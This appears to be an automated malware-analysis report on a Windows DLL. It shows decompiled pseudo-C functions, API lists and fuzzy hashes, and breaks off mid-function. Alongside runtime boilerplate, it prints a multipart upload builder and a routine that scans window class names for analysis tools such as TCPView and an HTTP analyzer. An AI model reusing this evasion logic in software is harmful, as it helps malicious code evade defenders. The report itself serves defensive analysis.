                                                                                                                                                      • API String ID: 3081802084-2935326385
                                                                                                                                                      • Opcode ID: 2fadef59205d778281ae9fe9edf870ac3f4638ab99f78137041e2ce31b984e5b
                                                                                                                                                      • Instruction ID: c19dd4f4148ea860b5569224362e113c716c363f4a93641ea984967bd2cc70da
                                                                                                                                                      • Opcode Fuzzy Hash: 2fadef59205d778281ae9fe9edf870ac3f4638ab99f78137041e2ce31b984e5b
                                                                                                                                                      • Instruction Fuzzy Hash: E9513EB4D00318ABEB10DF94DC95BDEB7B5EB84304F108198E509AB280D7B6AA94CF95
                                                                                                                                                      Uniqueness

                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                      C-Code - Quality: 85%
                                                                                                                                                      			E1000EFFC(intOrPtr __eax, intOrPtr __ebx, intOrPtr __ecx, intOrPtr __edx, intOrPtr __edi, intOrPtr __esi, char _a4) {
                                                                                                                                                      				intOrPtr _v0;
                                                                                                                                                      				void* _v804;
                                                                                                                                                      				intOrPtr _v808;
                                                                                                                                                      				intOrPtr _v812;
                                                                                                                                                      				intOrPtr _t6;
                                                                                                                                                      				intOrPtr _t11;
                                                                                                                                                      				intOrPtr _t12;
                                                                                                                                                      				intOrPtr _t13;
                                                                                                                                                      				long _t17;
                                                                                                                                                      				intOrPtr _t21;
                                                                                                                                                      				intOrPtr _t22;
                                                                                                                                                      				intOrPtr _t25;
                                                                                                                                                      				intOrPtr _t26;
                                                                                                                                                      				intOrPtr _t27;
                                                                                                                                                      				intOrPtr* _t31;
                                                                                                                                                      				void* _t34;
                                                                                                                                                      
                                                                                                                                                      				_t27 = __esi;
                                                                                                                                                      				_t26 = __edi;
                                                                                                                                                      				_t25 = __edx;
                                                                                                                                                      				_t22 = __ecx;
                                                                                                                                                      				_t21 = __ebx;
                                                                                                                                                      				_t6 = __eax;
                                                                                                                                                      				_t34 = _t22 -  *0x103322d8; // 0x493ea81e
                                                                                                                                                      				if(_t34 == 0) {
                                                                                                                                                      					asm("repe ret");
                                                                                                                                                      				}
                                                                                                                                                      				 *0x10333a58 = _t6;
                                                                                                                                                      				 *0x10333a54 = _t22;
                                                                                                                                                      				 *0x10333a50 = _t25;
                                                                                                                                                      				 *0x10333a4c = _t21;
                                                                                                                                                      				 *0x10333a48 = _t27;
                                                                                                                                                      				 *0x10333a44 = _t26;
                                                                                                                                                      				 *0x10333a70 = ss;
                                                                                                                                                      				 *0x10333a64 = cs;
                                                                                                                                                      				 *0x10333a40 = ds;
                                                                                                                                                      				 *0x10333a3c = es;
                                                                                                                                                      				 *0x10333a38 = fs;
                                                                                                                                                      				 *0x10333a34 = gs;
                                                                                                                                                      				asm("pushfd");
                                                                                                                                                      				_pop( *0x10333a68);
                                                                                                                                                      				 *0x10333a5c =  *_t31;
                                                                                                                                                      				 *0x10333a60 = _v0;
                                                                                                                                                      				 *0x10333a6c =  &_a4;
                                                                                                                                                      				 *0x103339a8 = 0x10001;
                                                                                                                                                      				_t11 =  *0x10333a60; // 0x0
                                                                                                                                                      				 *0x1033395c = _t11;
                                                                                                                                                      				 *0x10333950 = 0xc0000409;
                                                                                                                                                      				 *0x10333954 = 1;
                                                                                                                                                      				_t12 =  *0x103322d8; // 0x493ea81e
                                                                                                                                                      				_v812 = _t12;
                                                                                                                                                      				_t13 =  *0x103322dc; // 0xb6c157e1
                                                                                                                                                      				_v808 = _t13;
                                                                                                                                                      				 *0x103339a0 = IsDebuggerPresent();
                                                                                                                                                      				_push(1);
                                                                                                                                                      				E10013A5E(_t14);
                                                                                                                                                      				SetUnhandledExceptionFilter(0);
                                                                                                                                                      				_t17 = UnhandledExceptionFilter(0x10023b34);
                                                                                                                                                      				if( *0x103339a0 == 0) {
                                                                                                                                                      					_push(1);
                                                                                                                                                      					E10013A5E(_t17);
                                                                                                                                                      				}
                                                                                                                                                      				return TerminateProcess(GetCurrentProcess(), 0xc0000409);
                                                                                                                                                      			}

                                                                                                                                                      APIs
                                                                                                                                                      • IsDebuggerPresent.KERNEL32 ref: 100161C5
                                                                                                                                                      • SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 100161DA
                                                                                                                                                      • UnhandledExceptionFilter.KERNEL32(10023B34), ref: 100161E5
                                                                                                                                                      • GetCurrentProcess.KERNEL32(C0000409), ref: 10016201
                                                                                                                                                      • TerminateProcess.KERNEL32(00000000), ref: 10016208
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000002.00000002.418199354.0000000010001000.00000020.00000001.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                      • Associated: 00000002.00000002.418193488.0000000010000000.00000004.00000001.sdmp
                                                                                                                                                      • Associated: 00000002.00000002.418216949.0000000010023000.00000002.00000001.sdmp
                                                                                                                                                      • Associated: 00000002.00000002.418526635.0000000010332000.00000004.00000001.sdmp
                                                                                                                                                      • Associated: 00000002.00000002.418534419.0000000010337000.00000002.00000001.sdmp
                                                                                                                                                      • Associated: 00000002.00000002.418540972.0000000010338000.00000004.00000001.sdmp
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: ExceptionFilterProcessUnhandled$CurrentDebuggerPresentTerminate
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID: 2579439406-0
                                                                                                                                                      • Opcode ID: 469b891285ebbef8cb1b1fd3885dfcaa8d07e7beac247f7a81ea467a82630b0a
                                                                                                                                                      • Instruction ID: 7a4982afc0af0121ee83e1bbc930dedb521e4c826244c77e9c1cc9287b5788a2
                                                                                                                                                      • Opcode Fuzzy Hash: 469b891285ebbef8cb1b1fd3885dfcaa8d07e7beac247f7a81ea467a82630b0a
                                                                                                                                                      • Instruction Fuzzy Hash: 0A21CCB4901264EFE700DF29DCC86447BA8FB88311F50D11AE98D8AB62E7B499C5CF02
                                                                                                                                                      Uniqueness

                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                      C-Code - Quality: 83%
                                                                                                                                                      			E10021460(void* __ebx, void* __edi, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20, intOrPtr _a24, intOrPtr _a28, intOrPtr _a32, intOrPtr* _a36) {
                                                                                                                                                      				char _v8;
                                                                                                                                                      				intOrPtr _v16;
                                                                                                                                                      				char* _v20;
                                                                                                                                                      				char _v24;
                                                                                                                                                      				char _v28;
                                                                                                                                                      				char _v543;
                                                                                                                                                      				char _v544;
                                                                                                                                                      				char _v807;
                                                                                                                                                      				char _v808;
                                                                                                                                                      				char* _v812;
                                                                                                                                                      				char _v1079;
                                                                                                                                                      				char _v1080;
                                                                                                                                                      				char* _v1084;
                                                                                                                                                      				char* _v1088;
                                                                                                                                                      				char _v1599;
                                                                                                                                                      				char _v1600;
                                                                                                                                                      				intOrPtr _v1604;
                                                                                                                                                      				char _v15703;
                                                                                                                                                      				char _v15704;
                                                                                                                                                      				char* _v15708;
                                                                                                                                                      				char _v29807;
                                                                                                                                                      				char _v29808;
                                                                                                                                                      				char* _v29812;
                                                                                                                                                      				char _v43911;
                                                                                                                                                      				char _v43912;
                                                                                                                                                      				char _v58007;
                                                                                                                                                      				char _v58008;
                                                                                                                                                      				char _v58024;
                                                                                                                                                      				char _v58052;
                                                                                                                                                      				char _v58080;
                                                                                                                                                      				char _v58084;
                                                                                                                                                      				void* __esi;
                                                                                                                                                      				void* _t172;
                                                                                                                                                      				intOrPtr _t179;
                                                                                                                                                      				void* _t186;
                                                                                                                                                      				void* _t195;
                                                                                                                                                      				void* _t216;
                                                                                                                                                      				void* _t218;
                                                                                                                                                      				void* _t237;
                                                                                                                                                      				void* _t254;
                                                                                                                                                      				intOrPtr _t297;
                                                                                                                                                      				intOrPtr _t357;
                                                                                                                                                      				void* _t359;
                                                                                                                                                      				void* _t366;
                                                                                                                                                      				void* _t376;
                                                                                                                                                      				void* _t385;
                                                                                                                                                      				void* _t392;
                                                                                                                                                      
                                                                                                                                                      				_t353 = __edi;
                                                                                                                                                      				_t265 = __ebx;
                                                                                                                                                      				_push(0xffffffff);
                                                                                                                                                      				_push(E10022B1C);
                                                                                                                                                      				_push( *[fs:0x0]);
                                                                                                                                                      				 *[fs:0x0] = _t357;
                                                                                                                                                      				E10018AA0(0xe2d4);
                                                                                                                                                      				_push(_t354);
                                                                                                                                                      				_v24 = 0;
                                                                                                                                                      				_v28 = "--";
                                                                                                                                                      				if(_a16 != 0 && _a20 != 0 && _a24 != 0 && _a28 != 0 && _a32 > 0) {
                                                                                                                                                      					_v812 = "Content-Disposition: form-data; name=\"%s\"; %s=\"%s\"";
                                                                                                                                                      					_v1084 = "Content-Type: %s";
                                                                                                                                                      					_v1088 = "%s%s\r\n%s\r\n%s\r\n\r\n";
                                                                                                                                                      					_v808 = 0;
                                                                                                                                                      					E1000CF20(__edi,  &_v807, 0, 0x103);
                                                                                                                                                      					_v1080 = 0;
                                                                                                                                                      					E1000CF20(_t353,  &_v1079, 0, 0x103);
                                                                                                                                                      					_v1600 = 0;
                                                                                                                                                      					E1000CF20(_t353,  &_v1599, 0, 0x1ff);
                                                                                                                                                      					_push(_a20);
                                                                                                                                                      					_push(_a16);
                                                                                                                                                      					E1000CC93(_t353,  &_v808, _v812, _a16);
                                                                                                                                                      					E1000CC93(_t353,  &_v1080, _v1084, _a24);
                                                                                                                                                      					_push( &_v1080);
                                                                                                                                                      					_push( &_v808);
                                                                                                                                                      					_push(_a4);
                                                                                                                                                      					E1000CC93(_t353,  &_v1600, _v1088, _v28);
                                                                                                                                                      					_t392 = _t357 + 0x5c;
                                                                                                                                                      					if( *_a36 != 0) {
                                                                                                                                                      						E1000D190(__ebx, _t353, _t354,  *_a36 + _v24,  &_v1600, E1000CAC0( &_v1600));
                                                                                                                                                      						_t392 = _t392 + 0x10;
                                                                                                                                                      					}
                                                                                                                                                      					_t254 = E1000CAC0( &_v1600);
                                                                                                                                                      					_t357 = _t392 + 4;
                                                                                                                                                      					_v24 = _t254 + _v24;
                                                                                                                                                      					if( *_a36 != 0) {
                                                                                                                                                      						E1000D190(_t265, _t353, _t354,  *_a36 + _v24, _a28, _a32);
                                                                                                                                                      						_t357 = _t357 + 0xc;
                                                                                                                                                      					}
                                                                                                                                                      					_v24 = _v24 + _a32;
                                                                                                                                                      				}
                                                                                                                                                      				if(_a8 != 0 && _a12 > 0) {
                                                                                                                                                      					_t172 = E10001A50(_a8, "=");
                                                                                                                                                      					_t357 = _t357 + 8;
                                                                                                                                                      					if(_t172 != 0) {
                                                                                                                                                      						_v15708 = "Content-Disposition: form-data; name=\"%s\"";
                                                                                                                                                      						_v29812 = "\r\n%s%s\r\n%s\r\n\r\n%s";
                                                                                                                                                      						_v58008 = 0;
                                                                                                                                                      						E1000CF20(_t353,  &_v58007, 0, 0x370f);
                                                                                                                                                      						_v29808 = 0;
                                                                                                                                                      						E1000CF20(_t353,  &_v29807, 0, 0x370f);
                                                                                                                                                      						_v43912 = 0;
                                                                                                                                                      						E1000CF20(_t353,  &_v43911, 0, 0x370f);
                                                                                                                                                      						_v15704 = 0;
                                                                                                                                                      						E1000CF20(_t353,  &_v15703, 0, 0x370f);
                                                                                                                                                      						_t179 = E10001A50(_a8, "&");
                                                                                                                                                      						_t366 = _t357 + 0x38;
                                                                                                                                                      						_v1604 = _t179;
                                                                                                                                                      						if(_v1604 != 0) {
                                                                                                                                                      							E10001160( &_v58052, __eflags, _a8);
                                                                                                                                                      							_v8 = 0;
                                                                                                                                                      							E10002FE0( &_v58024, __eflags);
                                                                                                                                                      							_v8 = 1;
                                                                                                                                                      							E10001160( &_v58080, __eflags, "&");
                                                                                                                                                      							_v8 = 2;
                                                                                                                                                      							E1001A850(__eflags,  &_v58052,  &_v58024,  &_v58080);
                                                                                                                                                      							_t357 = _t366 + 0xc;
                                                                                                                                                      							_v58084 = 0;
                                                                                                                                                      							while(1) {
                                                                                                                                                      								_t186 = E100021E0( &_v58024);
                                                                                                                                                      								__eflags = _v58084 - _t186;
                                                                                                                                                      								if(_v58084 >= _t186) {
                                                                                                                                                      									break;
                                                                                                                                                      								}
                                                                                                                                                      								E1000CF20(_t353,  &_v43912, 0, 0x3710);
                                                                                                                                                      								E1000CF20(_t353,  &_v15704, 0, 0x3710);
                                                                                                                                                      								_t195 = E10001A50(E100011E0(E10003030( &_v58024, __eflags, _v58084)), "=");
                                                                                                                                                      								_t354 = _t195 - E100011E0(E10003030( &_v58024, __eflags, _v58084));
                                                                                                                                                      								E1000D190(_t265, _t353, _t195 - E100011E0(E10003030( &_v58024, __eflags, _v58084)),  &_v43912, E100011E0(E10003030( &_v58024, __eflags, _v58084)), _t195 - E100011E0(E10003030( &_v58024, __eflags, _v58084)));
                                                                                                                                                      								E1000D8A3(_v58084,  &_v15704, 0x3710, E10001A50(E100011E0(E10003030( &_v58024, __eflags, _v58084)), "=") + 1);
                                                                                                                                                      								E1000CF20(_t353,  &_v58008, 0, 0x3710);
                                                                                                                                                      								E1000CF20(_t353,  &_v29808, 0, 0x3710);
                                                                                                                                                      								E1000CC93(_t353,  &_v58008, _v15708,  &_v43912);
                                                                                                                                                      								_push( &_v15704);
                                                                                                                                                      								_push( &_v58008);
                                                                                                                                                      								_push(_a4);
                                                                                                                                                      								E1000CC93(_t353,  &_v29808, _v29812, _v28);
                                                                                                                                                      								_t376 = _t357 + 0x7c;
                                                                                                                                                      								__eflags =  *_a36;
                                                                                                                                                      								if( *_a36 != 0) {
                                                                                                                                                      									_t218 = E1000CAC0( &_v29808);
                                                                                                                                                      									__eflags =  *_a36 + _v24;
                                                                                                                                                      									E1000D190(_t265, _t353, _t354,  *_a36 + _v24,  &_v29808, _t218);
                                                                                                                                                      									_t376 = _t376 + 0x10;
                                                                                                                                                      								}
                                                                                                                                                      								_t216 = E1000CAC0( &_v29808);
                                                                                                                                                      								_t357 = _t376 + 4;
                                                                                                                                                      								_v24 = _t216 + _v24;
                                                                                                                                                      								_t297 = _v58084 + 1;
                                                                                                                                                      								__eflags = _t297;
                                                                                                                                                      								_v58084 = _t297;
                                                                                                                                                      							}
                                                                                                                                                      							_v8 = 1;
                                                                                                                                                      							E100011A0( &_v58080);
                                                                                                                                                      							_v8 = 0;
                                                                                                                                                      							E10003010( &_v58024);
                                                                                                                                                      							_v8 = 0xffffffff;
                                                                                                                                                      							E100011A0( &_v58052);
                                                                                                                                                      						} else {
                                                                                                                                                      							E1000D190(_t265, _t353, _t354,  &_v43912, _a8, E10001A50(_a8, "=") - _a8);
                                                                                                                                                      							E1000D8A3(_a8,  &_v15704, 0x3710, E10001A50(_a8, "=") + 1);
                                                                                                                                                      							E1000CF20(_t353,  &_v58008, 0, 0x3710);
                                                                                                                                                      							E1000CF20(_t353,  &_v29808, 0, 0x3710);
                                                                                                                                                      							E1000CC93(_t353,  &_v58008, _v15708,  &_v43912);
                                                                                                                                                      							_push( &_v15704);
                                                                                                                                                      							_push( &_v58008);
                                                                                                                                                      							_push(_a4);
                                                                                                                                                      							E1000CC93(_t353,  &_v29808, _v29812, _v28);
                                                                                                                                                      							_t385 = _t366 + 0x64;
                                                                                                                                                      							if( *_a36 != 0) {
                                                                                                                                                      								E1000D190(_t265, _t353, _t354,  *_a36 + _v24,  &_v29808, E1000CAC0( &_v29808));
                                                                                                                                                      								_t385 = _t385 + 0x10;
                                                                                                                                                      							}
                                                                                                                                                      							_t237 = E1000CAC0( &_v29808);
                                                                                                                                                      							_t357 = _t385 + 4;
                                                                                                                                                      							_v24 = _t237 + _v24;
                                                                                                                                                      						}
                                                                                                                                                      					}
                                                                                                                                                      				}
                                                                                                                                                      				_v20 = "\r\n%s%s%s\r\n";
                                                                                                                                                      				_v544 = 0;
                                                                                                                                                      				E1000CF20(_t353,  &_v543, 0, 0x1ff);
                                                                                                                                                      				_push(_v28);
                                                                                                                                                      				_push(_a4);
                                                                                                                                                      				E1000CC93(_t353,  &_v544, _v20, _v28);
                                                                                                                                                      				_t359 = _t357 + 0x20;
                                                                                                                                                      				if( *_a36 != 0) {
                                                                                                                                                      					E1000D190(_t265, _t353, _t354,  *_a36 + _v24,  &_v544, E1000CAC0( &_v544));
                                                                                                                                                      					_t359 = _t359 + 0x10;
                                                                                                                                                      				}
                                                                                                                                                      				_v24 = E1000CAC0( &_v544) + _v24;
                                                                                                                                                      				 *[fs:0x0] = _v16;
                                                                                                                                                      				return _v24;
                                                                                                                                                      			}



















































                                                                                                                                                      APIs
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000002.00000002.418199354.0000000010001000.00000020.00000001.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                      • Associated: 00000002.00000002.418193488.0000000010000000.00000004.00000001.sdmp
                                                                                                                                                      • Associated: 00000002.00000002.418216949.0000000010023000.00000002.00000001.sdmp
                                                                                                                                                      • Associated: 00000002.00000002.418526635.0000000010332000.00000004.00000001.sdmp
                                                                                                                                                      • Associated: 00000002.00000002.418534419.0000000010337000.00000002.00000001.sdmp
                                                                                                                                                      • Associated: 00000002.00000002.418540972.0000000010338000.00000004.00000001.sdmp
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: _memset$_sprintf_strlen$_strcpy_s$__flsbuf__output_l
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID: 854390245-0
                                                                                                                                                      • Opcode ID: 910685c5451b4cc4cbd4e9e1085cb89c7aa0c32abf0c4b0acda8ecd3dc8b06fe
                                                                                                                                                      • Instruction ID: 2d82e108429a1e59b14db5b6321f6623d8f234d0aa847db4e2dbab4e051ccd9c
                                                                                                                                                      • Opcode Fuzzy Hash: 910685c5451b4cc4cbd4e9e1085cb89c7aa0c32abf0c4b0acda8ecd3dc8b06fe
                                                                                                                                                      • Instruction Fuzzy Hash: BC0290B6D00218ABDB10DB90DC82FDE777DEB58340F4445A8F509A7285EB74AB44CFA2
                                                                                                                                                      Uniqueness

                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                      C-Code - Quality: 91%
                                                                                                                                                      			E100133E0(void* __ebx) {
                                                                                                                                                      				void* __edi;
                                                                                                                                                      				void* __esi;
                                                                                                                                                      				_Unknown_base(*)()* _t7;
                                                                                                                                                      				long _t10;
                                                                                                                                                      				void* _t11;
                                                                                                                                                      				int _t12;
                                                                                                                                                      				void* _t18;
                                                                                                                                                      				intOrPtr _t21;
                                                                                                                                                      				long _t26;
                                                                                                                                                      				void* _t30;
                                                                                                                                                      				struct HINSTANCE__* _t37;
                                                                                                                                                      				void* _t40;
                                                                                                                                                      				void* _t42;
                                                                                                                                                      
                                                                                                                                                      				_t30 = __ebx;
                                                                                                                                                      				_t37 = GetModuleHandleA("KERNEL32.DLL");
                                                                                                                                                      				if(_t37 != 0) {
                                                                                                                                                      					 *0x10333818 = GetProcAddress(_t37, "FlsAlloc");
                                                                                                                                                      					 *0x1033381c = GetProcAddress(_t37, "FlsGetValue");
                                                                                                                                                      					 *0x10333820 = GetProcAddress(_t37, "FlsSetValue");
                                                                                                                                                      					_t7 = GetProcAddress(_t37, "FlsFree");
                                                                                                                                                      					__eflags =  *0x10333818;
                                                                                                                                                      					_t40 = TlsSetValue;
                                                                                                                                                      					 *0x10333824 = _t7;
                                                                                                                                                      					if( *0x10333818 == 0) {
                                                                                                                                                      						L6:
                                                                                                                                                      						 *0x1033381c = TlsGetValue;
                                                                                                                                                      						 *0x10333818 = E10013097;
                                                                                                                                                      						 *0x10333820 = _t40;
                                                                                                                                                      						 *0x10333824 = TlsFree;
                                                                                                                                                      					} else {
                                                                                                                                                      						__eflags =  *0x1033381c;
                                                                                                                                                      						if( *0x1033381c == 0) {
                                                                                                                                                      							goto L6;
                                                                                                                                                      						} else {
                                                                                                                                                      							__eflags =  *0x10333820;
                                                                                                                                                      							if( *0x10333820 == 0) {
                                                                                                                                                      								goto L6;
                                                                                                                                                      							} else {
                                                                                                                                                      								__eflags = _t7;
                                                                                                                                                      								if(_t7 == 0) {
                                                                                                                                                      									goto L6;
                                                                                                                                                      								}
                                                                                                                                                      							}
                                                                                                                                                      						}
                                                                                                                                                      					}
                                                                                                                                                      					_t10 = TlsAlloc();
                                                                                                                                                      					__eflags = _t10 - 0xffffffff;
                                                                                                                                                      					 *0x10332c6c = _t10;
                                                                                                                                                      					if(_t10 == 0xffffffff) {
                                                                                                                                                      						L15:
                                                                                                                                                      						_t11 = 0;
                                                                                                                                                      						__eflags = 0;
                                                                                                                                                      					} else {
                                                                                                                                                      						_t12 = TlsSetValue(_t10,  *0x1033381c);
                                                                                                                                                      						__eflags = _t12;
                                                                                                                                                      						if(_t12 == 0) {
                                                                                                                                                      							goto L15;
                                                                                                                                                      						} else {
                                                                                                                                                      							E100117FA();
                                                                                                                                                      							 *0x10333818 = E10012FC8( *0x10333818);
                                                                                                                                                      							 *0x1033381c = E10012FC8( *0x1033381c);
                                                                                                                                                      							 *0x10333820 = E10012FC8( *0x10333820);
                                                                                                                                                      							 *0x10333824 = E10012FC8( *0x10333824);
                                                                                                                                                      							_t18 = E1000F88D();
                                                                                                                                                      							__eflags = _t18;
                                                                                                                                                      							if(_t18 == 0) {
                                                                                                                                                      								L14:
                                                                                                                                                      								E100130CA();
                                                                                                                                                      								goto L15;
                                                                                                                                                      							} else {
                                                                                                                                                      								_push(L10013256);
                                                                                                                                                      								_t21 =  *((intOrPtr*)(E10013034( *0x10333818)))();
                                                                                                                                                      								__eflags = _t21 - 0xffffffff;
                                                                                                                                                      								 *0x10332c68 = _t21;
                                                                                                                                                      								if(_t21 == 0xffffffff) {
                                                                                                                                                      									goto L14;
                                                                                                                                                      								} else {
                                                                                                                                                      									_t42 = E100148B1(1, 0x214);
                                                                                                                                                      									__eflags = _t42;
                                                                                                                                                      									if(_t42 == 0) {
                                                                                                                                                      										goto L14;
                                                                                                                                                      									} else {
                                                                                                                                                      										_push(_t42);
                                                                                                                                                      										_push( *0x10332c68);
                                                                                                                                                      										__eflags =  *((intOrPtr*)(E10013034( *0x10333820)))();
                                                                                                                                                      										if(__eflags == 0) {
                                                                                                                                                      											goto L14;
                                                                                                                                                      										} else {
                                                                                                                                                      											_push(0);
                                                                                                                                                      											_push(_t42);
                                                                                                                                                      											E10013107(_t30, _t37, _t42, __eflags);
                                                                                                                                                      											_t26 = GetCurrentThreadId();
                                                                                                                                                      											 *(_t42 + 4) =  *(_t42 + 4) | 0xffffffff;
                                                                                                                                                      											 *_t42 = _t26;
                                                                                                                                                      											_t11 = 1;
                                                                                                                                                      										}
                                                                                                                                                      									}
                                                                                                                                                      								}
                                                                                                                                                      							}
                                                                                                                                                      						}
                                                                                                                                                      					}
                                                                                                                                                      					return _t11;
                                                                                                                                                      				} else {
                                                                                                                                                      					E100130CA();
                                                                                                                                                      					return 0;
                                                                                                                                                      				}
                                                                                                                                                      			}
















                                                                                                                                                      0x10013527
                                                                                                                                                      0x1001353b
                                                                                                                                                      0x1001353d
                                                                                                                                                      0x00000000
                                                                                                                                                      0x1001353f
                                                                                                                                                      0x1001353f
                                                                                                                                                      0x10013541
                                                                                                                                                      0x10013542
                                                                                                                                                      0x10013549
                                                                                                                                                      0x1001354f
                                                                                                                                                      0x10013553
                                                                                                                                                      0x10013557
                                                                                                                                                      0x10013557
                                                                                                                                                      0x1001353d
                                                                                                                                                      0x10013524
                                                                                                                                                      0x10013510
                                                                                                                                                      0x100134f3
                                                                                                                                                      0x1001349e
                                                                                                                                                      0x10013563
                                                                                                                                                      0x100133f2
                                                                                                                                                      0x100133f2
                                                                                                                                                      0x100133fa
                                                                                                                                                      0x100133fa

                                                                                                                                                      APIs
                                                                                                                                                      • GetModuleHandleA.KERNEL32(KERNEL32.DLL,?,1000E9BD), ref: 100133E6
                                                                                                                                                      • __mtterm.LIBCMT ref: 100133F2
                                                                                                                                                        • Part of subcall function 100130CA: __decode_pointer.LIBCMT ref: 100130DB
                                                                                                                                                        • Part of subcall function 100130CA: TlsFree.KERNEL32(0000001D,1001355F), ref: 100130F5
                                                                                                                                                      • GetProcAddress.KERNEL32(00000000,FlsAlloc), ref: 10013408
                                                                                                                                                      • GetProcAddress.KERNEL32(00000000,FlsGetValue), ref: 10013415
                                                                                                                                                      • GetProcAddress.KERNEL32(00000000,FlsSetValue), ref: 10013422
                                                                                                                                                      • GetProcAddress.KERNEL32(00000000,FlsFree), ref: 1001342F
                                                                                                                                                      • TlsAlloc.KERNEL32 ref: 1001347F
                                                                                                                                                      • TlsSetValue.KERNEL32(00000000), ref: 1001349A
                                                                                                                                                      • __init_pointers.LIBCMT ref: 100134A4
                                                                                                                                                      • __encode_pointer.LIBCMT ref: 100134AF
                                                                                                                                                      • __encode_pointer.LIBCMT ref: 100134BF
                                                                                                                                                      • __encode_pointer.LIBCMT ref: 100134CF
                                                                                                                                                      • __encode_pointer.LIBCMT ref: 100134DF
                                                                                                                                                      • __decode_pointer.LIBCMT ref: 10013500
                                                                                                                                                      • __calloc_crt.LIBCMT ref: 10013519
                                                                                                                                                      • __decode_pointer.LIBCMT ref: 10013533
                                                                                                                                                      • __initptd.LIBCMT ref: 10013542
                                                                                                                                                      • GetCurrentThreadId.KERNEL32 ref: 10013549
                                                                                                                                                      Strings
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000002.00000002.418199354.0000000010001000.00000020.00000001.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                      • Associated: 00000002.00000002.418193488.0000000010000000.00000004.00000001.sdmp
                                                                                                                                                      • Associated: 00000002.00000002.418216949.0000000010023000.00000002.00000001.sdmp
                                                                                                                                                      • Associated: 00000002.00000002.418526635.0000000010332000.00000004.00000001.sdmp
                                                                                                                                                      • Associated: 00000002.00000002.418534419.0000000010337000.00000002.00000001.sdmp
                                                                                                                                                      • Associated: 00000002.00000002.418540972.0000000010338000.00000004.00000001.sdmp
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: AddressProc__encode_pointer$__decode_pointer$AllocCurrentFreeHandleModuleThreadValue__calloc_crt__init_pointers__initptd__mtterm
                                                                                                                                                      • String ID: FlsAlloc$FlsFree$FlsGetValue$FlsSetValue$KERNEL32.DLL
                                                                                                                                                      • API String ID: 2657569430-3819984048
                                                                                                                                                      • Opcode ID: e158e009452264019b86ef2b308fada79601061194b00a3a68f22d1eae1c8b62
                                                                                                                                                      • Instruction ID: fc5c9c1e2f27ce9595d1d322ac009eb1f7bdbda0747ab5db418f9efda91381a0
                                                                                                                                                      • Opcode Fuzzy Hash: e158e009452264019b86ef2b308fada79601061194b00a3a68f22d1eae1c8b62
                                                                                                                                                      • Instruction Fuzzy Hash: A3318D75C04221AADB12EB78CCC69057BE9EB843A1F10C53AF508DE2A2DB35D489CF90
                                                                                                                                                      Uniqueness

                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                      C-Code - Quality: 100%
                                                                                                                                                      			E100193D0(void* __ebx, void* __edi, void* __eflags, struct HWND__* _a4) {
                                                                                                                                                      				char _v267;
                                                                                                                                                      				char _v268;
                                                                                                                                                      				char _v531;
                                                                                                                                                      				char _v532;
                                                                                                                                                      				void* _t35;
                                                                                                                                                      				void* _t37;
                                                                                                                                                      				void* _t38;
                                                                                                                                                      				void* _t39;
                                                                                                                                                      				void* _t41;
                                                                                                                                                      				void* _t42;
                                                                                                                                                      				void* _t43;
                                                                                                                                                      				void* _t45;
                                                                                                                                                      				void* _t46;
                                                                                                                                                      				void* _t48;
                                                                                                                                                      				void* _t51;
                                                                                                                                                      				void* _t53;
                                                                                                                                                      				void* _t55;
                                                                                                                                                      				void* _t57;
                                                                                                                                                      				void* _t61;
                                                                                                                                                      				void* _t66;
                                                                                                                                                      				void* _t88;
                                                                                                                                                      				void* _t91;
                                                                                                                                                      				void* _t92;
                                                                                                                                                      				void* _t93;
                                                                                                                                                      				void* _t94;
                                                                                                                                                      				void* _t95;
                                                                                                                                                      				void* _t96;
                                                                                                                                                      				void* _t97;
                                                                                                                                                      				void* _t98;
                                                                                                                                                      				void* _t99;
                                                                                                                                                      				void* _t100;
                                                                                                                                                      
                                                                                                                                                      				_t87 = __edi;
                                                                                                                                                      				_t70 = __ebx;
                                                                                                                                                      				_v532 = 0;
                                                                                                                                                      				E1000CF20(__edi,  &_v531, 0, 0x103);
                                                                                                                                                      				_v268 = 0;
                                                                                                                                                      				E1000CF20(_t87,  &_v267, 0, 0x103);
                                                                                                                                                      				GetClassNameA(_a4,  &_v532, 0x104);
                                                                                                                                                      				GetWindowTextA(_a4,  &_v268, 0x104);
                                                                                                                                                      				_t35 = E1000CAC0( &_v532);
                                                                                                                                                      				_t91 = _t88 + 0x1c;
                                                                                                                                                      				_t108 = _t35;
                                                                                                                                                      				if(_t35 <= 0) {
                                                                                                                                                      					L30:
                                                                                                                                                      					return 1;
                                                                                                                                                      				}
                                                                                                                                                      				_t37 = E10019330(__ebx, _t87, _t108,  &_v532, "Afx:400000:8:10003:0:");
                                                                                                                                                      				_t92 = _t91 + 8;
                                                                                                                                                      				if(_t37 == 0) {
                                                                                                                                                      					_t38 = E10019330(__ebx, _t87, __eflags,  &_v532, "TCPViewClass");
                                                                                                                                                      					_t93 = _t92 + 8;
                                                                                                                                                      					__eflags = _t38;
                                                                                                                                                      					if(__eflags == 0) {
                                                                                                                                                      						_t39 = E10019330(__ebx, _t87, __eflags,  &_v532, "TStdHttpAnalyzerForm");
                                                                                                                                                      						_t94 = _t93 + 8;
                                                                                                                                                      						__eflags = _t39;
                                                                                                                                                      						if(__eflags == 0) {
                                                                                                                                                      							_t41 = E10019330(_t70, _t87, __eflags,  &_v532, "gdkWindowToplevel");
                                                                                                                                                      							_t95 = _t94 + 8;
                                                                                                                                                      							__eflags = _t41;
                                                                                                                                                      							if(__eflags == 0) {
                                                                                                                                                      								_t42 = E10019330(_t70, _t87, __eflags,  &_v532, "XTPMainFrame");
                                                                                                                                                      								_t96 = _t95 + 8;
                                                                                                                                                      								__eflags = _t42;
